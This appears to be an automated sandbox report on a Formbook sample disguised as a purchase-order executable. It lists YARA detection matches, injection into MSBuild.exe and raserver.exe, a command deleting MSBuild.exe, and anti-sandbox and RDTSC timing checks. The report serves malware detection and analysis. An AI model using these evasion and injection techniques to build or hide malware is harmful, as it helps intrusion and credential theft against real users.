          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exeBinary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: *.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@16/11
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 40,7045$.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01
          Source: Purchase Order 40,7045$.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmpBinary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Purchase Order 40,7045$.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Purchase Order 40,7045$.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Purchase Order 40,7045$.exeStatic file information: File size 1269760 > 1048576
          Source: Purchase Order 40,7045$.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x135800
          Source: Purchase Order 40,7045$.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000001.00000002.289628195.00000000014C0000.00000040.00000001.sdmp, raserver.exe, 00000006.00000002.522839886.00000000047B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Purchase Order 40,7045$.exe, a?opP?s???y/WD??v?aA?O.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Purchase Order 40,7045$.exe.810000.0.unpack, a?opP?s???y/WD??v?aA?O.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130DF50 push eax; ret 0_2_0130DF51
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415913 push edx; retf 1_2_00415915
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414D57 push esi; retf 1_2_00414D58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414DEA push eax; ret 1_2_00414E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414E7E push eax; ret 1_2_00414E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00414E24 push eax; ret 1_2_00414E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0153D0D1 push ecx; ret 1_2_0153D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0482D0D1 push ecx; ret 6_2_0482D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00675913 push edx; retf 6_2_00675915
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067AC62 push D8D19732h; iretd 6_2_0067AC69
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067AD65 push eax; ret 6_2_0067ADB8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674D57 push esi; retf 6_2_00674D58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674DEA push eax; ret 6_2_00674E32
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067ADB2 push eax; ret 6_2_0067ADB8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067ADBB push eax; ret 6_2_0067AE22
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674E7E push eax; ret 6_2_00674E32
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00674E24 push eax; ret 6_2_00674E32
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067AE1C push eax; ret 6_2_0067AE22
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0066FF92 push 00000033h; iretd 6_2_0066FF98
          Source: initial sampleStatic PE information: section name: .text entropy: 7.30520133301
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Purchase Order 40,7045$.exe PID: 6708, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000006683D4 second address: 00000000006683DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000066876E second address: 0000000000668774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeThread delayed: delay time: 922337203685477